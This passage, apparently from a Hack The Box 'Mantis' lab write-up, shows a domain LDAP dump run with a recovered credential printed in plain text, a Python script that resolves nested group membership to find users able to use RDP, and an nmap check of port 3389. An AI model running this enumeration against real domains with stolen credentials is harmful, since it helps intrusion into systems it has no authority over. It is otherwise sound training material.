ldapdomaindump
┌──(kali㉿kali)-[~/…/htb/labs/mantis/ldapdomaindump]
└─$ ldapdomaindump $IP -u "htb.local\james" -p 'J@m3s_P@ssW0rd!' --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
With the domain credential recovered from the MSSQL server, I can dump the whole LDAP directory with ldapdomaindump. The bind succeeds, so the password is valid against the domain controller itself, not just MSSQL.
The james user is a member of the Remote Desktop Users group, which means I should be able to RDP to the target host.
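Reading one row of the dump tells me about james, but Remote Desktop Users can also be reached through nested groups, which a single memberOf value hides. The script below is an added example (not from the original writeup and not part of ldapdomaindump) that resolves effective membership from the .grep files ldapdomaindump writes when run without --no-grep. The sample rows are constructed, and the layout (tab-separated, header row, multi-valued attributes joined with ", ") is assumed from the tool's grepable output.

```python
import csv
import io
import re
from typing import Dict, List, Set

# Constructed sample rows in the shape of ldapdomaindump's domain_users.grep
# and domain_groups.grep (assumed layout: tab-separated, header row,
# multi-valued attributes joined with ", "). Not real dump output.
USERS_GREP = (
    "cn\tsAMAccountName\tmemberOf\n"
    "james\tjames\tCN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local\n"
    "svc_backup\tsvc_backup\tCN=Helpdesk,OU=Groups,DC=htb,DC=local\n"
    "bob\tbob\t\n"
)
GROUPS_GREP = (
    "cn\tsAMAccountName\tmemberOf\n"
    "Helpdesk\tHelpdesk\tCN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local\n"
    "Remote Desktop Users\tRemote Desktop Users\t\n"
)


def parse_grep(text: str) -> List[Dict[str, str]]:
    """Parse one .grep file into a list of row dicts keyed by header name."""
    return list(csv.DictReader(io.StringIO(text), delimiter="\t"))


def split_dns(value: str) -> List[str]:
    """Split a joined multi-valued DN attribute without breaking on the
    commas inside each DN: only split where the next DN starts (CN=)."""
    if not value:
        return []
    return re.split(r", (?=CN=)", value)


def cn_of(dn: str) -> str:
    """Return the leading RDN value of a DN, e.g. 'Helpdesk'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def effective_groups(users_text: str, groups_text: str) -> Dict[str, Set[str]]:
    """Map sAMAccountName -> every group reachable through nested memberOf.

    Caveat: memberOf never lists a user's primary group (usually Domain
    Users), so that one is not reflected here."""
    parents = {
        g["cn"]: [cn_of(dn) for dn in split_dns(g["memberOf"])]
        for g in parse_grep(groups_text)
    }
    result: Dict[str, Set[str]] = {}
    for user in parse_grep(users_text):
        seen: Set[str] = set()
        stack = [cn_of(dn) for dn in split_dns(user["memberOf"])]
        while stack:  # walk group -> parent group until no new groups appear
            group = stack.pop()
            if group in seen:
                continue
            seen.add(group)
            stack.extend(parents.get(group, []))
        result[user["sAMAccountName"]] = seen
    return result


def rdp_capable(users_text: str, groups_text: str,
                group: str = "Remote Desktop Users") -> List[str]:
    """Users who end up in the given group directly or via nesting."""
    return sorted(
        name for name, groups in effective_groups(users_text, groups_text).items()
        if group in groups
    )


if __name__ == "__main__":
    print(rdp_capable(USERS_GREP, GROUPS_GREP))
```

Run it against the real files with `open("domain_users.grep").read()` and `open("domain_groups.grep").read()`; svc_backup shows up in the result only because Helpdesk is itself nested under Remote Desktop Users, which is the case a plain grep for the group name would miss.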
By default, RDP listens on TCP port 3389, so I check that first.
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ nmap -p3389 $IP
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-10 18:17 CET
Nmap scan report for htb.local (10.10.10.52)
Host is up (0.031s latency).

PORT     STATE  SERVICE
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
But it seems RDP is disabled on the target host. Nmap reports the port as closed rather than filtered, meaning the host answered with a RST and nothing is listening on 3389, so this is not just a firewall in the way; the Remote Desktop Users membership is of no use until the service is enabled.